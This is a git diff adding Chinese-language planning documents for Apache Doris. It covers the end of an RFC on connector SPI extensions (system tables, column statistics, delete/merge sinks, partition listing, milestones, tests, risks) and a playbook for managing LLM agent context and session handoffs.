看作"特殊命名的普通表"。`ConnectorTableOps.getTableHandle(session, db, "tbl$snapshots")` 由 connector 内部解析 `$snapshots` 后缀,返回带 sys-type 标记的 handle(标记在 connector 内部,对 fe-core 透明)。 + +新增一个 listing 入口供 `SHOW TABLES` 选择性展示: + +```java +public interface ConnectorTableOps { + // ... existing ... + + /** + * Lists the connector-specific system table suffixes available for a base table. + * Returns the set of suffixes (without the leading "$"), e.g., ["snapshots", "history", "files"]. + * Default: empty (no sys tables). + */ + default List listSysTableSuffixes(ConnectorSession session, + ConnectorTableHandle baseTableHandle) { + return Collections.emptyList(); + } +} +``` + +`getTableSchema(session, sysHandle)` 返回的 schema 中 `tableFormatType = "ICEBERG_SYS"` / `"PAIMON_SYS"`,scan provider 走对应路径。 + +### 10.3 fe-core 侧 + +`PluginDrivenExternalDatabase.tableExists("tbl$snapshots")` 路由到 `connector.getMetadata(s).getTableHandle(s, db, "tbl$snapshots")`。 + +`information_schema.tables` 默认不展开 sys table(避免噪音);用户显式 `SHOW TABLES LIKE '%$%'` 时才查 `listSysTableSuffixes`。 + +### 10.4 影响 + +- Iceberg、Paimon 实现 `listSysTableSuffixes` + `getTableHandle("$xxx")`。 +- 其他 connector:默认空。 + +### 10.5 验收标准 + +- `SELECT * FROM cat.db.tbl$snapshots` 工作。 +- `SHOW TABLES` 默认不返回 `tbl$snapshots`。 + +--- + +## 11. 扩展 E8:列级 Statistics 写入 / `ConnectorColumnStatistics` + +### 11.1 现状 + +- `HMSExternalTable.createAnalysisTask(info) → ExternalAnalysisTask`。 +- task 跑 `ANALYZE TABLE ... COMPUTE STATISTICS` 后调 `HiveMetadataOps.updateColumnStatistics(...)`。 + +### 11.2 设计 + +```java +// connector.api.statistics.ConnectorColumnStatistics +package org.apache.doris.connector.api.statistics; + +/** + * Per-column statistics for a connector table. + * + *

Type safety for {@code minValue} / {@code maxValue} (U6): + * Values are stored as {@link Object} but MUST be one of the Java boxed types + * listed below, matched to the column's {@link ConnectorType}. Connectors + * reading a value that does not match the expected type MUST throw + * {@link IllegalArgumentException}; fe-core translates this to a + * user-visible {@code UserException}.

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
Allowed Java types for min/max by ConnectorType family
ConnectorType familyJava boxed type
BOOLEAN{@link Boolean}
TINYINT / SMALLINT / INT{@link Integer}
BIGINT{@link Long}
LARGEINT / DECIMAL{@link java.math.BigDecimal}
FLOAT{@link Float}
DOUBLE{@link Double}
DATE{@link java.time.LocalDate}
DATETIME / TIMESTAMP{@link java.time.Instant}
CHAR / VARCHAR / STRING{@link String}
BINARY / VARBINARY{@code byte[]}
ARRAY / MAP / STRUCTmin/max NOT applicable — must be {@code null}
+ */ +public final class ConnectorColumnStatistics { + private final long nullCount; // -1 unknown + private final long ndv; // num distinct values; -1 unknown + private final Object minValue; // boxed per type table above; null = no min + private final Object maxValue; // boxed per type table above; null = no max + private final long avgRowSizeBytes; // -1 unknown + private final long maxRowSizeBytes; // -1 unknown + // builder + getters +} +``` + +### 11.3 在 `ConnectorStatisticsOps` 新增 + +```java +public interface ConnectorStatisticsOps { + // ... existing getTableStatistics ... + + /** Returns per-column statistics, or empty map if unavailable. */ + default Map getColumnStatistics( + ConnectorSession session, ConnectorTableHandle handle) { + return Collections.emptyMap(); + } + + /** + * Persists per-column statistics back to the external metastore. + * Called by {@code ANALYZE TABLE} after FE computes statistics. + */ + default void setColumnStatistics(ConnectorSession session, + ConnectorTableHandle handle, + Map columnStats) { + throw new DorisConnectorException("setColumnStatistics not supported"); + } +} +``` + +### 11.4 fe-core 侧 + +`ExternalAnalysisTask.persist(...)` 检测 catalog 是否为 `PluginDrivenExternalCatalog` —— 是则调 `connector.getMetadata(s).setColumnStatistics(s, handle, statsMap)`。 + +### 11.5 影响 + +- 主要 Hive(HMS column stats)。 +- Iceberg / Paimon 可选(snapshot summary 已包含部分统计)。 + +### 11.6 验收标准 + +- `ANALYZE TABLE hive_cat.db.tbl COMPUTE STATISTICS FOR ALL COLUMNS` 后,HMS 中能查到 column stats。 + +--- + +## 12. 扩展 E9:Delete / Merge Sink 配置 + +### 12.1 现状 + +- `fe/fe-core/.../planner/IcebergDeleteSink.java`、`IcebergMergeSink.java`、`IcebergTableSink.java` 是 nereids physical sink 的实现。 +- 它们 import `IcebergExternalTable`、`IcebergMetadataOps`,跟 fe-core 强耦合。 +- Iceberg `DELETE FROM` / `MERGE` 走 `IcebergDeleteCommand` / `IcebergMergeCommand` 命令类。 + +### 12.2 设计 + +扩展 `ConnectorWriteType` 枚举: + +```java +public enum ConnectorWriteType { + FILE_WRITE, + JDBC_WRITE, + REMOTE_OLAP_WRITE, + CUSTOM, + FILE_DELETE, // [NEW] Iceberg position-delete or equality-delete files + FILE_MERGE, // [NEW] row-level merge (insert + delete) +} +``` + +在 `ConnectorWriteOps` 新增: + +```java +public interface ConnectorWriteOps { + // ... existing getWriteConfig ... + + /** + * Returns the configuration for a DELETE operation. Connector tells BE how to + * write delete files (position-delete vs equality-delete vs MOR). + */ + default ConnectorWriteConfig getDeleteConfig(ConnectorSession session, + ConnectorTableHandle handle, List filterColumns) { + throw new DorisConnectorException("Delete not supported"); + } + + /** + * Returns the configuration for a MERGE (combined insert+delete) operation. + */ + default ConnectorWriteConfig getMergeConfig(ConnectorSession session, + ConnectorTableHandle handle, + List insertColumns, + List deleteFilterColumns) { + throw new DorisConnectorException("Merge not supported"); + } +} +``` + +### 12.3 fe-core 侧 + +P6.3 中: + +- 删除 `IcebergDeleteSink` / `IcebergMergeSink` / `IcebergTableSink`,统一改为 `PhysicalConnectorTableSink`(已存在)。 +- `PhysicalConnectorTableSink` 根据 `ConnectorWriteType` 构造对应 `TDataSink`: + - `FILE_WRITE` → `THiveTableSink` / `TIcebergTableSink`(或新统一的 `TConnectorFileSink`) + - `FILE_DELETE` → `TIcebergDeleteSink` + - `FILE_MERGE` → `TIcebergMergeSink` +- 这层 thrift 选择仍由 fe-core 做(thrift 类型是 wire 协议);connector 只需要返回 `ConnectorWriteConfig`。 + +### 12.4 影响 + +- Iceberg(DELETE / MERGE / UPDATE)。 +- Hive ACID(DELETE / UPDATE)—— P7.3。 +- Paimon(MERGE-on-read)—— P5。 + +### 12.5 验收标准 + +- Iceberg `DELETE FROM t WHERE id < 100` 在 connector 模块化后输出与旧路径 bit-for-bit 一致的 delete file。 +- `MERGE INTO target USING source ON ... WHEN MATCHED THEN DELETE WHEN NOT MATCHED THEN INSERT` 跑通。 + +--- + +## 13. 扩展 E10:Partition 列举 / `listPartitions` + +### 13.1 现状 + +- `HMSExternalCatalog.listPartitionNames`、`MaxComputeExternalCatalog.listPartitionNames`、`PaimonExternalCatalog.listPartitions`。 +- 调用方:`MetadataGenerator`(TVF 后端)、`PartitionsTableValuedFunction`、`ShowPartitionsCommand`、Nereids 分区裁剪(`HivePartitionPruner`)。 + +### 13.2 设计(**复用现有** `ConnectorPartitionInfo`) + +```java +public interface ConnectorTableOps { + // ... existing ... + + /** + * Lists all partition display names (e.g., "year=2024/month=01"). + * Cheap; should avoid loading partition metadata. + */ + default List listPartitionNames(ConnectorSession session, + ConnectorTableHandle handle) { + return Collections.emptyList(); + } + + /** + * Lists partitions matching the optional filter, with full metadata. + * Expensive; should use partition pruning when possible. + */ + default List listPartitions(ConnectorSession session, + ConnectorTableHandle handle, + Optional filter) { + return Collections.emptyList(); + } + + /** + * Lists distinct partition column value combinations. + * Used by partition_values() TVF and column-distinct-value optimizations. + */ + default List> listPartitionValues(ConnectorSession session, + ConnectorTableHandle handle, + List partitionColumns) { + return Collections.emptyList(); + } +} +``` + +### 13.3 增强 `ConnectorPartitionInfo`(向后兼容追加字段) + +当前已有:`partitionName`、`partitionValues`、`properties`。 + +追加只读字段(不破坏构造器签名 —— 用 builder 模式追加): + +```java +public final class ConnectorPartitionInfo { + // existing fields ... + private final long rowCount; // -1 unknown + private final long sizeBytes; // -1 unknown + private final long lastModifiedMillis; // -1 unknown + + // existing 3-arg constructor delegates to the new 6-arg constructor with -1/-1/-1 + public ConnectorPartitionInfo(String partitionName, Map partitionValues, + Map properties) { + this(partitionName, partitionValues, properties, -1, -1, -1); + } + + public ConnectorPartitionInfo(String partitionName, Map partitionValues, + Map properties, long rowCount, long sizeBytes, long lastModifiedMillis) { + // ... + } + + public long getRowCount() { return rowCount; } + public long getSizeBytes() { return sizeBytes; } + public long getLastModifiedMillis() { return lastModifiedMillis; } +} +``` + +### 13.4 影响 + +- Hive、Iceberg、Paimon、MaxCompute、Hudi(任何 partitioned 外部表)。 +- 调用方收口:`MetadataGenerator`、`PartitionsTableValuedFunction`、`ShowPartitionsCommand` 三处改走 `PluginDrivenExternalCatalog.getConnector().getMetadata(...).listPartitions(...)`。 + +### 13.5 验收标准 + +- `SHOW PARTITIONS FROM cat.db.tbl` 输出 bit-for-bit 等同于旧路径。 +- `partition_values('cat.db.tbl', 'col')` TVF 等价。 +- 1000-partition Hive 表 `listPartitionNames` 性能不退化 5% 以上。 + +--- + +## 14. 实施顺序与里程碑 + +### 14.1 实施顺序 + +10 个扩展点不需要全部一次性进 mainline;可分阶段: + +| 批次 | 扩展点 | 时机 | 阻塞的 P 阶段 | +|---|---|---|---| +| **批 0**(先行) | E3(MetaInvalidator)、E4(Transaction)、E5(MvccSnapshot)| P0 内必须完成 | 这三个是后续连接器实现 ConnectorMetadata 时的 baseline | +| **批 1** | E1(CreateTableRequest)、E10(listPartitions)| P0 末 / P1 初 | 阻塞 P3 hudi、P5 paimon | +| **批 2** | E6(Credentials)、E7(SysTables)、E9(Delete/Merge)| P5 之前 | 阻塞 P5 paimon、P6 iceberg | +| **批 3** | E2(Procedures)| P6 之前 | 阻塞 P6 iceberg actions | +| **批 4** | E8(Column Statistics)| P7 之前 | 阻塞 P7 Hive ANALYZE | + +### 14.2 P0 里程碑(共计约 2 周) + +``` +W0 ─ Day 1-2 本 RFC 评审、调整签名 +W0 ─ Day 3-5 实现批 0(E3/E4/E5)的接口 + javadoc + 默认行为 +W1 ─ Day 1-3 实现批 1(E1/E10)的接口 + fe-core converter 草稿 +W1 ─ Day 4-5 实现 fe-core 侧 ExternalMetaCacheInvalidator、PluginDrivenTransactionManager 通用版 +W1 ─ Day 5 CI grep 守门脚本 tools/check-connector-imports.sh + maven enforcer 接入 +``` + +### 14.3 批 2-4 在各 P 阶段开始时随主任务一起做 + +每个连接器迁移启动前 1-2 天,把该阶段需要的扩展点接口/默认实现写进 fe-connector-api,然后再开始迁移。 + +--- + +## 15. 测试策略 + +### 15.1 单元测试 + +- 每个新增类型都有等价 / 哈希 / 序列化(如适用)测试,放 `fe-connector-api/src/test/java/...//`。 +- 默认方法行为测试:定义一个"什么都不实现"的 `BaseConnectorTest` mock connector,调每个 default 方法验证抛错/返回空一致。 + +### 15.2 fe-core 侧 converter 测试 + +- `CreateTableInfoToConnectorRequestConverter`:覆盖 Hive identity partition、Iceberg transform partition、List partition、Range partition 四种来源。 +- `ExternalMetaCacheInvalidator`:mock `ExternalMetaCacheMgr`,验证每个 invalidate 方法都正确路由到对应 cache 方法。 + +### 15.3 集成回归 + +- ES、JDBC 这两个已迁连接器的 regression-test 子集必须全绿(证明现有 SPI 没被破坏)。 +- 新增一个 `FakeConnectorPlugin` 在 `fe/fe-core/src/test/`,覆盖所有新增 default 行为路径。 + +### 15.4 grep 守门 + +```bash +# tools/check-connector-imports.sh +#!/bin/bash +set -e +FORBIDDEN='org\.apache\.doris\.(catalog|common|datasource|qe|analysis|nereids|planner)' +RESULT=$(grep -rEn "^import ${FORBIDDEN}\." fe/fe-connector/*/src/main/java \ + | grep -v 'org.apache.doris.thrift' \ + | grep -v 'org.apache.doris.connector' \ + | grep -v 'org.apache.doris.extension' \ + | grep -v 'org.apache.doris.filesystem' || true) +if [ -n "$RESULT" ]; then + echo "FORBIDDEN IMPORTS in fe-connector modules:" >&2 + echo "$RESULT" >&2 + exit 1 +fi +``` + +挂到 maven enforcer plugin 的 `pre-compile` 阶段。 + +--- + +## 16. 风险与未决问题 + +### 16.1 风险 + +| ID | 风险 | 缓解 | +|---|---|---| +| Q1 | `ConnectorProcedureSpec.arguments` 用 `Object` 装载值类型不安全 | 限定允许的类型枚举:`String/Long/Double/Boolean/Instant/List/Map`;构造时校验 | +| Q2 | `ConnectorMetaInvalidator` 在异常路径被调用时可能 leak(线程未停)| `Connector.close()` 中要明确停止 listener thread | +| Q3 | `ConnectorTransaction.commit` 在跨多个 BE 分片场景下不是简单调用——需要 fe-core 先收集 commit info | 已在 `ConnectorWriteOps.finishInsert(handle, fragments)` 覆盖;`beginTransaction` 只负责开/关,不负责 commit 数据 | +| Q4 | `ConnectorMvccSnapshot.snapshotId` 是 long,但有的系统(Delta Lake 未来引入)用 string | 暂用 long;如未来需要再加 `String getSnapshotIdAsString()` | +| Q5 | E1 的 `ConnectorPartitionField.transform` 字符串编码不规范 | 在 RFC 附录列举允许的 transform 字符串集合(与 Iceberg 对齐:`identity / year / month / day / hour / bucket[N] / truncate[N]`)| +| Q6 | E9 的 thrift sink 选择仍在 fe-core,可能跟不上 connector 新增 sink 类型 | 在 `ConnectorWriteConfig.properties` 留 `"thrift_sink_type"` 自定义字段 + `CUSTOM` 走 generic sink 兜底 | + +### 16.2 未决问题(✅ 2026-05-24 全部决议) + +| ID | 问题 | 决议 | +|---|---|---| +| U1 | `ConnectorProcedureSpec.listProcedures` 是否在 connector 初始化时一次性返回,还是允许动态变化? | ✅ **一次性**。Connector 生命周期内稳定;如外部系统的可用 procedure 集合变化,必须重新创建 catalog | +| U2 | `ConnectorMetaInvalidator` 是否要 `invalidateColumnStatistics(...)`? | ✅ **暂不要**。column stats 失效一并挂在 `invalidateTable` 上,避免接口表面膨胀;后续如发现频繁单独失效再加 | +| U3 | `ConnectorTransaction.getTransactionId` 是连接器分配还是 fe-core 分配? | ✅ **连接器分配**。连接器自己最清楚事务 ID 与外部系统的对应关系;fe-core 在 `PluginDrivenTransactionManager` 用 `Map` 索引即可 | +| U4 | `getCredentialsForScan` 是否要批量化? | ✅ **是**。签名定为 `Map getCredentialsForScans(session, handle, List)`,由连接器自由决定 STS 调用粒度(共享实例 / 按 prefix 分组 / 1:1),fe-core 一个 scan node 一次调用 | +| U5 | sys-table 命名约定(`$snapshots` vs `\$snapshots` vs `[$snapshots]`)跨方言一致性? | ✅ **统一 `$suffix`**。SPI 层固定该约定;如未来发现冲突(如某 SQL dialect 把 `$` 视为变量前缀),通过 catalog property `sys_table_separator` 提供别名机制,但不在本 RFC 范围 | +| U6 | `ConnectorColumnStatistics.minValue / maxValue` 用 `Object` 装载,类型安全如何保证? | ✅ **javadoc 类型映射表 + 抛 `IllegalArgumentException`**。在 `ConnectorColumnStatistics` javadoc 中列出 `ConnectorType` ↔ Java 装箱类型映射(见 §11.2);连接器读到不匹配类型时直接抛 `IllegalArgumentException`,由 fe-core 转成 `UserException` 返回客户端 | + +--- + +## 17. 验收清单(出 P0 时勾选) + +``` +[ ] fe-connector-api 编译通过,新增类型 / 方法全部就位 +[ ] fe-connector-spi 仅新增 ConnectorMetaInvalidator 接口,无其他改动 +[ ] fe-core 侧 converter(CreateTableInfoToConnectorRequestConverter、ExternalMetaCacheInvalidator、ConnectorMvccSnapshotAdapter)就位 +[ ] PluginDrivenTransactionManager 通用化(不再依赖任何具体连接器) +[ ] JDBC、ES 现有 regression-test 全绿 +[ ] FakeConnectorPlugin 覆盖所有新增 default 行为 +[ ] tools/check-connector-imports.sh 接入 maven enforcer +[x] 本 RFC 关闭未决问题 U1-U6,签名定稿 ← ✅ 2026-05-24 完成 +[ ] plan-doc/00 §3.1 P0 任务全部勾选 +``` + +--- + +## 18. 附录 A:所有新增 / 修改的文件清单 + +``` +新增(fe-connector-api): + org/apache/doris/connector/api/ddl/ConnectorCreateTableRequest.java + org/apache/doris/connector/api/ddl/ConnectorPartitionSpec.java + org/apache/doris/connector/api/ddl/ConnectorPartitionField.java + org/apache/doris/connector/api/ddl/ConnectorPartitionValueDef.java + org/apache/doris/connector/api/ddl/ConnectorBucketSpec.java + org/apache/doris/connector/api/procedure/ConnectorProcedureOps.java + org/apache/doris/connector/api/procedure/ConnectorProcedureSpec.java + org/apache/doris/connector/api/procedure/ConnectorProcedureArgument.java + org/apache/doris/connector/api/mvcc/ConnectorMvccSnapshot.java + org/apache/doris/connector/api/scan/ConnectorCredentials.java + org/apache/doris/connector/api/statistics/ConnectorColumnStatistics.java + +替换(fe-connector-api): + org/apache/doris/connector/api/handle/ConnectorTransaction.java + (原 ConnectorTransactionHandle 保留为父接口;ConnectorTransaction 继承它) + +修改(fe-connector-api,仅新增 default 方法): + ConnectorMetadata.java ← extends ConnectorProcedureOps + ConnectorTableOps.java ← createTable(request) / listPartitions / listPartitionNames / + listPartitionValues / listSysTableSuffixes + ConnectorWriteOps.java ← beginTransaction / getDeleteConfig / getMergeConfig + ConnectorStatisticsOps.java ← getColumnStatistics / setColumnStatistics + ConnectorScanPlanProvider.java ← getCredentialsForScan + ConnectorSession.java ← getCurrentTransaction + ConnectorWriteType.java ← + FILE_DELETE, FILE_MERGE + ConnectorPartitionInfo.java ← + rowCount/sizeBytes/lastModifiedMillis (with backward-compat ctor) + +新增(fe-connector-spi): + org/apache/doris/connector/spi/ConnectorMetaInvalidator.java + +修改(fe-connector-spi): + ConnectorContext.java ← getMetaInvalidator() + +新增(fe-core 桥接): + org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverter.java + org/apache/doris/connector/ExternalMetaCacheInvalidator.java + org/apache/doris/connector/ConnectorMvccSnapshotAdapter.java + +修改(fe-core): + org/apache/doris/connector/DefaultConnectorContext.java ← getMetaInvalidator override + org/apache/doris/connector/ConnectorSessionImpl.java ← currentTransaction field + org/apache/doris/transaction/PluginDrivenTransactionManager.java ← 通用化 +``` + +## 19. 附录 B:Allowed Transform 字符串(E1 用) + +| 字符串 | 含义 | 来源风格 | +|---|---|---| +| `identity` | 原值分区 | Hive / Iceberg | +| `year` | 取年份 | Iceberg | +| `month` | 取年月 | Iceberg | +| `day` | 取年月日 | Iceberg | +| `hour` | 取年月日时 | Iceberg | +| `bucket` | 哈希分桶;`transformArgs = [N]` | Iceberg | +| `truncate` | 截断;`transformArgs = [W]` | Iceberg | +| `list` | 显式列表分区,初始值在 `initialValues` | Doris | +| `range` | 显式范围分区,初始值在 `initialValues` | Doris | + +未列出的字符串视为 `CUSTOM`,由 connector 内部识别。 diff --git a/plan-doc/AGENT-PLAYBOOK.md b/plan-doc/AGENT-PLAYBOOK.md new file mode 100644 index 00000000000000..e47c84131aabb9 --- /dev/null +++ b/plan-doc/AGENT-PLAYBOOK.md @@ -0,0 +1,280 @@ +# Agent 协作规范 — Context 管理与最佳实践 + +> 本项目是大型多阶段重构,预计跨数月、上百个 PR、可能跨数十个 LLM agent session。 +> 本规范旨在让"无论哪一次 session、由哪个 agent 接手,都能高质量推进",**核心是 context 管理**。 + +--- + +## 一、为什么需要规范 + +LLM agent 协作的三大失效模式: + +1. **Context 中毒**:单 session 累积太多无关信息,模型注意力分散、决策质量下降、出现幻觉。 +2. **认知断层**:换 session 后失去前情,重复探索 / 推翻已有决策 / 重新发明轮子。 +3. **维护脱节**:代码改了文档不改,下次进 session 时基于过时文档做错误判断。 + +本规范用三类工具应对: +- **Context 预算与监控**(§2)—— 防失效模式 1 +- **Subagent 与 Handoff**(§3、§4)—— 防失效模式 1、2 +- **强制纪律**(§5)—— 防失效模式 3 + +--- + +## 二、Context 预算 + +### 2.1 单 session 预算 + +| Context 使用率 | 状态 | 推荐行为 | +|---|---|---| +| **0–40%** | 🟢 健康 | 正常工作,可以做任何任务 | +| **40–60%** | 🟢 健康偏高 | 开始倾向于把"独立的探索 / 大文件读"转给 subagent | +| **60–75%** | 🟡 警觉 | **不再读 ≥500 行的整文件**;只做精确 grep / offset+limit read;准备 handoff 草稿 | +| **75–85%** | 🟠 高危 | **停止接新任务**;完成手头 1 个原子工作;写 HANDOFF.md;通知用户切 session | +| **>85%** | 🔴 危险 | **只做记录性工作**(更新 PROGRESS / HANDOFF);不再做任何决策 / 代码生成 | + +> Claude Code 中可通过 `/context` 查看当前用量;如不可见,按"已发起的工具调用数 + 已读文件总行数"粗略估算。 + +### 2.2 用户对 session 的隐式预期 + +如果用户在一次 session 中要求"重构 X 模块 + 写文档 + 提交 PR",agent 应: + +- 评估 context 占用:单凭 RFC + 现有代码探索就可能吃掉 30-40% +- **主动报告**:在开始执行前告知 "此任务预计占用约 40% context,是否需要先写 handoff 占位以便分两个 session 完成?" + +### 2.3 节省 context 的硬性技巧 + +1. **永远不要 `Read` 整个 >1000 行的文件** —— 用 `grep` 定位行号,再用 `offset + limit` 精读。 +2. **永远不要重复 grep 同一个 pattern** —— 在 session 心智里记住结果。 +3. **避免 `cat` / `find -type f -name '*.java'` 全量列举** —— 用更精准的 grep / find 加过滤。 +4. **避免 `git log -p`** —— 用 `git log --oneline -20`,需要 diff 再单独 `git show `。 +5. **大文件总结优先用 subagent**(见 §3):让 subagent 读 5000 行返回 200 字总结。 + +--- + +## 三、Subagent 使用规范 + +### 3.1 何时**必须**用 subagent + +- **跨 5+ 文件的代码搜索 / 调研**(如"找出 fe-core 中所有 instanceof HMSExternalCatalog 的地方") +- **读取 >1000 行的单文件后只取关键信息**(如 IcebergMetadataOps.java 1247 行,只需了解 createTable 路径) +- **独立的、不影响主线决策的小重构**(如"批量改 import 路径",给 subagent prompt + 文件列表,背景执行) +- **独立的代码评审**(如"review 这次 PR 的安全性",需要重读大量上下文) + +### 3.2 何时**不要**用 subagent + +- 主线决策环节 —— subagent 给的建议你最终还是要消化,不如自己做 +- 1-2 次 grep / read 就能解决的简单查找 —— 启动 subagent 的固定开销不值得 +- 需要持续交互的探索(边读边问"那 X 呢")—— subagent 一次性输出,互动不便 +- 涉及"修改后立即验证"的小改动 —— 主 session 闭环更快 + +### 3.3 写 subagent prompt 的硬性规则 + +``` +1. 自包含:不能假设 subagent 知道主线对话内容。明确说"working directory: /...", + "background: 这是 XX 项目的 YY 阶段,目标是 ZZ"。 +2. 输出格式约束:明确"返回 markdown 表格 / 总字数 ≤ 500 / 只列文件路径不带代码"。 +3. 范围约束:明确"只看 fe-core 目录"、"忽略 test 目录"、"不读 README"。 +4. 决策权约束:明确"只调研,不做任何修改"或"可以修改 X 但不能动 Y"。 +5. 一次性:避免让 subagent 内部继续延伸调研——主 session 来决定下一步。 +``` + +### 3.4 Subagent 类型选择(Claude Code 内) + +| 任务类型 | 推荐 subagent | 备注 | +|---|---|---| +| 大范围代码搜索 | `Explore` | 只读、快、context 隔离 | +| 多步独立工作 | `general-purpose` | 可以执行 grep / read / edit | +| 实现计划设计 | `Plan` | 只产出方案不写代码 | +| 都不适合 | `claude`(默认)| 兜底 | + +### 3.5 Background 模式 + +长耗时任务(如 `mvn test`、跨模块 build)使用 `run_in_background: true`,主 session 不被阻塞。完成时会自动通知,**不要 sleep 轮询**。 + +--- + +## 四、Handoff(跨 session 接管) + +### 4.1 何时**必须**写 handoff + +- Context 使用率 ≥ 70%(§2.1) +- 当前 P 阶段结束(如 P0 → P1 切换) +- 工作天然分段(如"下周再继续") +- 出现长时间阻塞,等其他人 review / 等 CI 跑(≥4 小时) +- 用户主动说"今天到此为止" + +### 4.2 何时**不需要**写 handoff + +- 同一 session 内自然继续 +- Context < 50% 且任务还很短 + +### 4.3 Handoff 文档结构 + +见 [`HANDOFF.md`](./HANDOFF.md) 模板。核心字段: + +1. **本 session 完成了什么**(具体到 task ID、PR、commit) +2. **当前正在做的事是否完整**(如果中途停的,写明卡在哪个文件、哪一行) +3. **关键认知 / 临时发现**(如"刚发现 X 类的 Y 方法有意外副作用"——这种东西不写下来下次会重复踩坑) +4. **下一个 session 第一件事做什么**(精确到 task ID + 第一行代码 / 命令) +5. **当前 session 没解决但需要标记的问题**(不是 TODO 而是"开放问题") + +### 4.4 Handoff 文件存放 + +- 单个滚动文件 `plan-doc/HANDOFF.md` +- 每次 session 结束时**覆盖式更新** +- 历史 handoff 通过 `git log plan-doc/HANDOFF.md` 查看 +- **不要**建 `handoffs/2026-05-24.md` 这种归档目录 —— git history 已经胜任 + +### 4.5 接管新 session 的开场流程 + +新 session 开始第一件事(**所有 agent 必须遵守**): + +``` +1. Read plan-doc/PROGRESS.md ← 全局状态 +2. Read plan-doc/HANDOFF.md ← 上次留言 +3. 如果 HANDOFF 标记当前 task: + Read plan-doc/tasks/Pn-*.md 中对应 task 块 +4. 用一句话向用户复述:"上次 session 做完了 X,下一步是 Y,对吗?" +5. 等用户确认后开始 +``` + +**不要**在没读 HANDOFF 的情况下问"我们上次做到哪了" —— 这是失败模式。 + +--- + +## 五、强制纪律 + +### 5.1 文档同步纪律 + +每次完成 task: +1. 更新 `tasks/Pn-*.md` 对应 task 状态 +2. 更新 `PROGRESS.md` §三和§四 +3. 更新 `connectors/.md`(如果该 task 属于某个连接器) +4. 如果产生新决策 → `decisions-log.md` 新增 D-NNN +5. 如果发现偏差 → `deviations-log.md` 新增 DV-NNN + +**5 步缺一不可**。否则下次 session 看到的状态就是错的。 + +### 5.2 RFC 修改纪律 + +任何修改 `01-spi-extensions-rfc.md` 的行为: +1. 先在 `deviations-log.md` 或 `decisions-log.md` 留痕(区别见 [README §3.1](./README.md)) +2. 在 RFC 该节加 `(D-NNN / DV-NNN 修订 YYYY-MM-DD)`脚注 +3. 不要 silent edit + +### 5.3 Task ID 纪律 + +- Task ID 一旦分配**永不复用** +- 删除的 task 标 `[deleted YYYY-MM-DD]` 保留占位行 +- 重命名 task 不改 ID + +### 5.4 提交信息纪律 + +PR title 第一行必须 `[Pn-Tnn] `,例如: +``` +[P0-T03] Implement ConnectorMetaInvalidator interface +``` + +--- + +## 六、Anti-Patterns(绝对禁止) + +| 反模式 | 为什么禁止 | 正确做法 | +|---|---|---| +| 一个 session 又读 RFC、又改 SPI、又写实现、又跑测试 | Context 爆炸;决策质量下降 | 拆 session:阅读/设计 → handoff → 实现 → handoff → 验证 | +| 跨 session 凭记忆继续工作 | 模型完全没记忆,认知断层 | 强制读 HANDOFF | +| Subagent 也用来做"小事" | 启动开销大于收益 | <2 次 grep 直接主线做 | +| 把 RFC 当 PROGRESS 用 | RFC 是设计稳定文档,频繁更新会污染 git history | PROGRESS / tasks / handoff 才是状态文件 | +| Handoff 写得像周报 | 周报对用户有用,对下一个 agent 无用 | 写"下一步第一行命令是什么"才有用 | +| 多个 session 并发改同一 task | 重复劳动 / 文档冲突 | 同一时刻一个 task 只一个 owner | +| Decision / Deviation 直接写到 RFC 里不进 log | 失去追溯性 | 先 log 再改 RFC | + +--- + +## 七、各类 session 的典型节奏(参考) + +### 7.1 "设计 + 评审" session(高密度阅读) + +``` +开场:Read PROGRESS + HANDOFF (3% context) +主体:Read 3-5 个核心文件 + RFC 某节 (25% context) + ↓ + 与用户来回讨论 5-10 轮 (+30% context) + ↓ + Edit / Write 文档(RFC 修改、decision 记录) (+10% context) +收尾:更新 PROGRESS + 写 HANDOFF (+5% context) + ───────── + ~73% 健康终止 +``` + +### 7.2 "代码实现" session(中等密度) + +``` +开场:Read PROGRESS + HANDOFF + 对应 task (5%) +主体:Read 现有相关代码(精读,offset+limit) (15%) + ↓ + Write / Edit 实现 (+15%) + ↓ + Run tests(如可),修复错误 (+15%) +收尾:更新 task 状态 + PROGRESS + git commit + HANDOFF (+10%) + ───────── + ~60% +``` + +### 7.3 "调研 / 探索" session(高度依赖 subagent) + +``` +开场:Read PROGRESS + HANDOFF (3%) +主体:dispatch subagent 做 5-10 路并行调研 (+10% 主线 +50% subagent) + ↓ + 综合 subagent 结果做决策 (+10%) + ↓ + Write 调研结论文档(如新 RFC) (+10%) +收尾:更新 PROGRESS + decisions-log + HANDOFF (+5%) + ───────── + ~38% +``` + +--- + +## 八、Context "重启"策略 + +如果 context 已经超 75% 但任务还没做完: + +1. **优先保存状态**:立即写 HANDOFF.md,详细到下一行代码该写什么 +2. **完成原子收尾**:当前正在 Edit 的文件**改完 + 保存**,不要留半截 +3. **更新 PROGRESS**:把已完成的 task 标 ✅ +4. **提醒用户切 session**:"Context 已 ~78%,建议开新 session 继续。HANDOFF 已写好,新 session 第一句话发 'continue from handoff' 即可。" +5. **不要硬撑**:每多用 1% context 都在降低质量 + +--- + +## 九、Multi-agent 协作的边界 + +本项目原则上一个 task 由一个 agent 推进,但允许: + +- **并行 subagent**:调研 / 测试 / build 等独立任务并行 +- **审计 subagent**:让一个 subagent 审核主线工作(如"以挑刺 reviewer 视角看这次改动") +- **接力**:handoff 后由完全不同的 agent / 人接手 + +**不允许**: +- 同时两个 agent 改同一 task +- Subagent 跨阶段(subagent 只做本 session 的工作,不要让 subagent 自己写 HANDOFF) + +--- + +## 十、面向"未来 agent"的元规则 + +如果你(未来 agent)发现本规范本身需要修改: + +1. 不要直接改本文件 —— 先在 `deviations-log.md` 写 `DV-NNN: AGENT-PLAYBOOK 规则 X 在场景 Y 不适用` +2. 与用户讨论后再修改本文件 +3. 修改时在文末 §十一 加版本号 + 变更说明 + +--- + +## 十一、版本 + +| 版本 | 日期 | 变更 | +|---|---|---| +| v1 | 2026-05-24 | 初版(与 README、PROGRESS、HANDOFF 同时建立) | diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md new file mode 100644 index 00000000000000..228d7ad910df83 --- /dev/null +++ b/plan-doc/HANDOFF.md @@ -0,0 +1,150 @@ +# 🤝 Session Handoff + +> 这是**滚动文档**:每次 session 结束时覆盖更新;历史通过 `git log plan-doc/HANDOFF.md` 查看。 +> 新 session 开始时必读:[PROGRESS.md](./PROGRESS.md) → 本文件 → 对应 task 文件。 +> 协作规范:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md) 